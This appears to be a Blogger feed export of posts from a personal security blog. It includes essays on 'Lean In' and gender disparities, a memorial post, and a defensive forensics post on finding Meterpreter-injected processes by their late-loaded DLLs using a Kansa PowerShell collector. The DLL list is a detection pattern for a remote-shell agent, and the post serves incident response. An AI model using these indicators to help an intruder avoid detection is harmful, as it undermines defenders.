target="_blank">continue to exploring more of the reasons for this disparity</a>.</span></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">If you need a little confidence boost, put on your headphones and crank this up.<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/cwLRQn61oUY" width="320" youtube-src-id="cwLRQn61oUY"></iframe></div></span></div></div>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-9311402665388071032024-02-23T16:16:00.000-08:002024-03-03T16:53:26.508-08:00The Problem is the People, but Which People?<div>In my second job out of college, my boss' boss would often say, "Wherever you go there's always a problem and the problem is always the people." I wondered to myself, "Yeah, but which people?"</div><div><br /></div><div>In my <a href="https://trustedsignal.blogspot.com/2024/02/lean-in-for-yourself.html" target="_blank">previous post in this series</a>, I recounted how reading Sheryl Sandberg's book, <a href="https://www.alibris.com/Lean-in-Women-Work-and-the-Will-to-Lead-Sheryl-Sandberg/book/28224373?matches=778">Lean In: Women, Work, and the Will to Lead</a>, reminded me of my grandfather refusing to let my grandmother pursue her master's degree because he didn't want her to have more formal education than he did; a sad example of a woman wanting to lean in to her career and a man not just failing to support her through passivity, but actively preventing her from achieving more.</div><div><br /></div><div>I mentioned in that post that my motivation for reading <u>Lean In</u> was to become a better leader. Sandberg is an amazingly successful business leader. She was integral to building both Google and Facebook. Another motivator was that I want to be able to speak to my daughters about Sandberg's book from having read it, not from having read about it. </div><div><br /></div><div><u>Lean In</u> came out in 2013 and was a number one international bestseller, but it wasn't without criticism. I'm not going provide a critique or a review as I'm not qualified to do so. I will share some of the things I thought were interesting and valuable to me. I encourage you to read it for yourself and to read the criticism also.</div><div><br /></div><div>Sandberg tells us she wrote the book</div><div></div><blockquote><div>"to encourage women to dream big, forge a path through the obstacles, and <b>achieve their full potential</b>. I am hoping that each woman will set her own goals and reach for them with gusto. And I am hoping that <b>each man will do his part to support women in the workplace and in the home</b> with gusto. As we start using the talents of the entire population, our institutions will be more productive, our homes will be happier, and the children growing up in those homes will no longer be held back by narrow stereotypes." (Sandbrerg, 2013, p. 171)</div><div></div></blockquote><div>I <i>mostly</i> agree with Sandberg. There is some daylight between us around the <i>heteronormativity</i> of the statement, but in general, I agree that we should encourage and support women to reach their full potential. I want the same for anyone regardless of their gender or where they fall on the <a href="https://www.scientificamerican.com/article/sex-redefined-the-idea-of-2-sexes-is-overly-simplistic1/" target="_blank">spectrum of biological sex</a>. I think any good natured, rational person should want any other person to achieve their full potential.</div><div><br /></div><div>Sandberg's reasons for writing <u>Lean In</u> beg the question, are women failing to reach their full potential? The book and a few minutes searching online make it clear that women are underrepresented in traditional positions of power, and are paid less than men for the same work. </div><div><br /></div><div>Women make up 50 percent of the population, yet they currently hold 10 percent of Fortune 500 CEO positions and that's a record high (<a href="https://fortune.com/2023/06/05/fortune-500-companies-2023-women-10-percent/" target="_blank">Fortune, Hinchliffe</a>). Kunal Modi, cited in my previous post points out <span style="font-family: inherit;">that women make up only 17 percent of the U.S. Congress and 16 percent of C-suites. <span>(</span><a href="https://www.huffpost.com/entry/man-up-on-family-and-work_b_1667878" target="_blank">Huffington Post, Modi</a><span>)</span></span></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">"Women earn 57 percent of undergraduate degrees <span>and account for nearly 60 percent of all graduate school enrollment. However, in the disciplines that continue to define America's economic future -- engineering, computer science, mathematics, and physical sciences -- women earn less than half of all degrees." (<a href="https://www.huffpost.com/entry/man-up-on-family-and-work_b_1667878" target="_blank">Huffington Post, Modi</a>)</span></span></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">There's debate about the cause of these disparities. Recall the 10 page document authored by James </span>Damore, "Google's Ideological Echo Chamber," where Damore presented evidence that biological differences between men and women may explain these disparities. As with so much of social science, here, the science is unsettled. (<a href="https://www.wired.com/story/the-pernicious-science-of-james-damores-google-memo/" target="_blank">Wired, Molteni</a>)</div><div><br /></div><div>Damore's memo cites studies that show "men systematize, women empathize" and that this may be the reason for women's underrepresentation in technical or leadership roles rather than active discrimination. Yet even in high empathy roles like human resources where "<span style="color: #1e293b;"><span style="font-family: inherit;">76% of HR Managers are women, male HR Managers earn 40% more than their female counterparts." (<a href="https://www.visier.com/blog/gender-divide-part-1/" target="_blank">Visier, Barron</a>) Read that again. If it's not active discrimination, there are egregious sins of omission resulting in this pay gap. </span></span></div><div><br /></div><div>Given these facts, it's hard to believe anyone would argue in good faith that women are realizing their full potential. </div><div><span style="color: #1e293b;"><span style="font-family: inherit;"><br /></span></span></div><div><span style="color: #1e293b;"><span style="font-family: inherit;"><span style="color: black;">If we accept that there's a problem, what is the cause? My old boss' boss would say it's the people. Sure, but which people? Why are women underrepresented in leadership and how do we fix it? Sandberg has much to say on this and I'll dive into it in my <a href="https://trustedsignal.blogspot.com/2024/03/whats-cause-of-problem.html" target="_blank">next post</a>. </span></span></span></div><div><span style="color: #1e293b;"><span style="font-family: inherit;"><span style="color: black;"><br /></span></span></span></div><div><span style="color: #1e293b;"><span style="font-family: inherit;"><span style="color: black;">Until then, I'm taking inspiration from Beyoncé's going hard and slaying all day, maybe you will too.</span></span></span></div><div><span style="color: #1e293b;"><span style="font-family: inherit;"><span style="color: black;"><br /></span></span></span></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/WDZJPJV__bQ" width="320" youtube-src-id="WDZJPJV__bQ"></iframe></div><br /><div><br /></div>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-56200563265345033122024-02-17T17:36:00.000-08:002024-02-23T16:20:41.472-08:00Lean In for Yourself<div style="text-align: left;">Small family farming is a labor intensive way to go broke. </div><div style="text-align: left;"><br /></div><div style="text-align: left;">When I was young I spent some weeks each summer with my grandparents. As farmers and cattle ranchers, my grandparents scratched out an existence. My grandpa was up before dawn feeding cattle and out working fields of corn, milo, sorghum, soybeans, and wheat until after sunset. There were too few boom years, and too many bust years. They had neighbors who lost everything. My grandparents survived.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">One thing that helped keep them afloat was my grandmother's rural elementary school teacher salary. When we ran errands together we frequently encountered her former students and it was clear from the things they said that they loved and respected her.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">At one point she decided to get her master's degree. My granddad stopped her. He didn't like the idea that she would have more formal education than he did.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">I've been thinking about this bit of my family history lately, prompted by reading <a href="https://www.linkedin.com/in/sheryl-sandberg-5126652/" target="_blank">Sheryl Sandberg's</a> book, <a href="https://www.alibris.com/Lean-in-Women-Work-and-the-Will-to-Lead-Sheryl-Sandberg/book/28224373?matches=778">Lean In: Women, Work, and the Will to Lead</a>.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">My granddad may have perceived that his pride was spared by preventing my grandmother from pursuing her master's, but I've been thinking about the emotional, financial, and communal costs. Was my grandmother wounded by this? How could she not be? She would have made more money over her career and may have been a better educator, which would have benefited an entire community.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">If he would have been supportive, allowed her to lean in to her career and leaned in more at home himself, how would things have been different?</div><div style="text-align: left;"><br /></div><div style="text-align: left;">As I said, my reflections on this were prompted by Sandberg's book, which I read because I'm a people manager and Sandberg is an incredibly accomplished leader and I want to pick up the lessons of great leaders wherever I can. </div><div style="text-align: left;"><br /></div><div style="text-align: left;">I'm also a father to three young women. I want to support them in their careers and Sandberg is arguably one of the most successful business leaders of all time, perhaps I could learn something that would help me help my daughters.</div><p>This personal family anecdote came to me as I was thinking about this quote from Sandberg's book:</p><div></div><blockquote><div>"Kunal Modi, a student at Harvard's Kennedy School, wrote an article imploring men to 'Man Up on Family and Workplace Issues.' He argued that 'for the sake of American corporate performance and shareholder returns, men must play an active role in ensuring that the most talented young workers (often women...) are being encouraged to advocate for their career advancement... So men, let's get involved now -- and not in a patronizing manner that marginalizes this as some altruistic act on behalf of our mothers, wives, and daughters -- but on behalf of ourselves, our companies, and the future of our country." (Sandberg, 2013, pp. 165-166)</div></blockquote><p>Modi calls men to <b>support "the most talented young workers," not out of altruism, "but on behalf of ourselves,"</b> Had my granddad supported my grandmother's pursuit of her master's degree, it would have been to his benefit, to the benefit of his family, and to the benefit of the community.</p><p>We should follow Modi's advice and ensure "that the most talented young workers (often women...) are being encouraged to advocate for their career advancement." We shouldn't do this out of altruism, as Modi suggests, we should do it because it will benefit everyone, including ourselves.</p><p>Note that Modi doesn't say we should do this for women only, he says we should do it for our "most talented young workers," and the implication is that that group may include women, and if it does, we should be encouraging them because they are the most talented. This doesn't appear to be about affirmative action or Diversity, Equity and Inclusion. It's about encouraging the best, period.</p><p>This is the first in a series of posts where I'm reflecting on Sandberg's book in an effort to synthesize my own understanding of the issues and to glean general management insights. In the <a href="https://trustedsignal.blogspot.com/2024/02/the-problem-is-people-but-which-people.html" target="_blank">next post</a>, I'll offer evidence from Sandberg's book and elsewhere supporting her thesis that there is a problem.</p><p>I'll end this post with Taylor Swift's tribute to her grandmother, Marjorie. </p><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/hP6QpMeSG6s" width="320" youtube-src-id="hP6QpMeSG6s"></iframe></div>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-29622079649616697532021-07-13T13:50:00.001-07:002021-07-13T13:50:10.733-07:00RIP Grant W. Dotson -- A dear friend<p>It's been a rough day. </p><p>About 18 months ago a friend of mine from high school posted a Go FundMe on Facebook for a mutual friend who was battling cancer. This mutual friend was someone I'd been very close to in elementary and middle school. As happens, we remained friends, but drifted apart a bit in high school, different interests and new friend groups, etc.</p><p>We went off to different colleges and touched base infrequently, but we did touch base. He came to visit me when certain musicians were performing in town and we would go to those shows together. We shared a love for jazz bands and artists like Medeski, Martin and Wood, Bill Frisell, Miles Davis, etc.</p><p>I had no idea he'd been fighting cancer for more than a year. I called him up and got the full story. He was upbeat and optimistic that he would beat it. I planned to go see him, then COVID hit. We stayed in touch, talked every few weeks and texted back and fourth almost daily. It was as if no time had past in the intervening years since childhood.</p><p>A few weeks ago, he texted me that he was in the hospital. The cancer that had ravaged his liver and bowels had spread to his lungs. He was undergoing a tough round of chemo to "nip it from [his] lungs so he could return to bettersville." </p><p>The texts became less frequent. I asked him how he was doing. He said the chemo had made things worse. He was on four liters of oxygen and still couldn't catch his breath. The optimism that he'd expressed for the last 18 months was gone. I cried, told him my heart was breaking for him, that I loved him and that if there was anything I could do for him, please let me know.</p><p>He thanked me for being a good friend. That was a week ago.</p><p>I meant to text him yesterday. Life got in the way. Last night I was laying in bed concerned. I picked up my phone and searched for obituaries in my home town where he still lived. Nothing, thankfully.</p><p>This morning a post in our high school class group on Facebook said that he had passed away yesterday. I cried again. My mind raced with memories of carefree days growing up with him as a constant companion. He was special. Always kind and caring.</p><p>Rest in peace, Grant. I already miss our conversations.</p><p>Hug your loved ones, cherish the moments. Life is short.</p>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-88258105261473368152020-08-04T21:32:00.004-07:002020-08-04T21:38:30.200-07:00Hunting injected processes by the modules they keep<div>A <a href="https://trustedsignal.blogspot.com/2020/07/meterpreters-migrate-detection-and.html" target="_blank">relatively recent post showed how Metasploit's Meterpreter module made some noise on endpoints when the <font face="courier">migrate</font></a> command was used to move the agent code into a legitimate process, <font face="courier">spoolsv.exe</font> in our example.</div><div><br /></div><div>One of the things we saw in that post was that when the agent migrates, it uses commonplace injection techniques that result in three dlls being reflectively loaded into the target process. These dlls are not registered with the process and therefore don't show up in the output of something like <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/listdlls" target="_blank">listdlls</a>, but we were able to find them using <a href="https://twitter.com/gleeda" target="_blank">gleeda's</a> <a href="https://github.com/gleeda/memtriage" target="_blank">memtriage</a> in combination with <a href="https://www.volatilityfoundation.org/" target="_blank">Volatility's</a> <a href="https://github.com/volatilityfoundation/volatility/wiki/Command-Reference-Mal#malfind" target="_blank">malfind</a> plugin. Worth mentioning again, memtriage is really useful because it facilitates some memory analysis without the need for a full memory dump. See the other post for details.</div><div><br /></div><div>We also noted that these three dlls have dependencies on native Windows dlls and these dozen or so dlls are loaded at the time of agent migration. Depending on how long the target process has been running, these may be "late loaded dlls," which could be a powerful detection. These late loaded dlls are registered in the process, so we can go hunting for them using something like listdlls, <a href="https://docs.microsoft.com/en-us/powershell/scripting/overview?view=powershell-7" target="_blank">PowerShell's</a> Get-Process cmdlet or a relatively new <a href="https://github.com/davehull/Kansa" target="_blank">Kansa</a> module built around the Get-Process cmdlet -- <a href="https://github.com/davehull/Kansa/blob/master/Modules/Process/Get-ProcessesUsingModules.ps1" target="_blank">Get-ProcessesUsingModules.ps1</a>.</div><div><br /></div><div>This new module is one of the few Kansa modules that can take command line arguments, this makes it a bit awkward to use. There's an old post <a href="https://trustedsignal.blogspot.com/2014/07/kansa-passing-arguments-to-collector.html" target="_blank">here</a> on what this can look like and we'll dive into the specifics for this new module now.</div><div><br /></div><div><font face="arial" size="2">PS > .\kansa.ps1 -Target $env:computername <i>-ModulePath ".\Modules\Process\Get-ProcessesUsin</i></font><span style="font-family: arial; font-size: small;"><i>gModules.ps1 wininet.dll,iertutil.dll,winhttp.dll,dhcpcsvc6.dll,dhcpcsvc.dll,webio.dll,psapi.dll,winmm.dll,winmmbase.dll</i></span></div><div><font face="arial" size="2"><i>,ole32.dll,mpr.dll,netapi32.dll"</i> -Credential $cred</font></div><div><font face="arial" size="2"><br /></font></div><div><font face="inherit">Above is an example command-line for running this new collector with a list of dlls. This list of dlls matches what we saw late loaded into our </font><font face="courier">spoolsv.exe</font><font face="inherit"> process following the migration into that process. Note the double-quotes around the name of the module and its arguments. It's also worth noting that depending on the configuration of the meterpreter agent, there may be different dlls loaded. In our example, I was using a reverse http handler. The example still stands, however. If you're analyzing a piece of malware and can determine what dlls it imports, you may be able to put together a list of modules that you can pass to this collector to see if there are processes that have those dlls loaded. The process may have other dlls loaded too, </font><font face="courier">spoolsv.exe</font><font face="inherit"> certainly does, but this list of dlls was a result of the agent migration and they are not normally loaded into </font><font face="courier">spoolsv.exe</font><font face="inherit">.</font></div><div><font face="inherit"><br /></font></div><div><font face="inherit">Our console output from running this looks like the below, assuming verbose mode:</font></div><div><font face="inherit"><br /></font></div><div><font face="arial" size="2">VERBOSE: Running module:</font></div><div><font face="arial" size="2">Get-ProcessesUsingModules</font></div><div><font face="arial" size="2">wininet.dll,iertutil.dll,winhttp.dll,dhcpcsvc6.dll,dhcpcsvc.dll,webio.dll,psapi.dll,winmm.dll,winmmbase.dll,ole32.dll,m</font></div><div><font face="arial" size="2">pr.dll,netapi32.dll</font></div><div><font face="arial" size="2">VERBOSE: Found logging.conf</font></div><div><font face="arial" size="2">VERBOSE: Running module on machines 0 to 1 of 1 (0.0 %)</font></div><div><font face="arial" size="2">VERBOSE: Waiting for Get-ProcessesUsingModules wininet.dll iertutil.dll winhttp.dll dhcpcsvc6.dll dhcpcsvc.dll</font></div><div><font face="arial" size="2">webio.dll psapi.dll winmm.dll winmmbase.dll ole32.dll mpr.dll netapi32.dll to complete.</font></div><div><font face="arial" size="2"><br /></font></div><div><font face="arial" size="2">Id Name PSJobTypeName State HasMoreData Location Command</font></div><div><font face="arial" size="2">-- ---- ------------- ----- ----------- -------- -------</font></div><div><font face="arial" size="2">7 Job7 RemoteJob Completed True WINS2012R202 <# ...</font></div><div><font face="arial" size="2">WARNING: ProcessesUsingModules's output path contains arguments that were passed to it. Those arguments were truncated f</font></div><div><font face="arial" size="2">rom wininet.dlliertutil.dllwinhttp.dlldhcpcsvc6.dlldhcpcsvc.dllwebio.dllpsapi.dllwinmm.dllwinmmbase.dllole32.dllmpr.dlln</font></div><div><font face="arial" size="2">etapi32.dll to wininet.dlliertutil.dllwinhttp.dlldhcpcsvc6.dlldhcpcsvc.dllwebio.dllpsap to accommodate Window's MAXPATH</font></div><div><font face="arial" size="2">limitations of 260 characters.</font></div><div><font face="arial" size="2">VERBOSE: ### All Done ###</font></div><div><br /></div><div>Note the MAXPATH issue. The way Kansa works, the directory names for the collector output include command line arguments and in this case, those arguments exceed the default limits on my Windows system, so Kansa makes some adjustments and truncates them.</div><div><br /></div><div>What does the collector output look like, below is a snapshot of the output folder for this collector, note the long folder name.</div><div><br /></div><div><img alt="" src="data:image/png;base64,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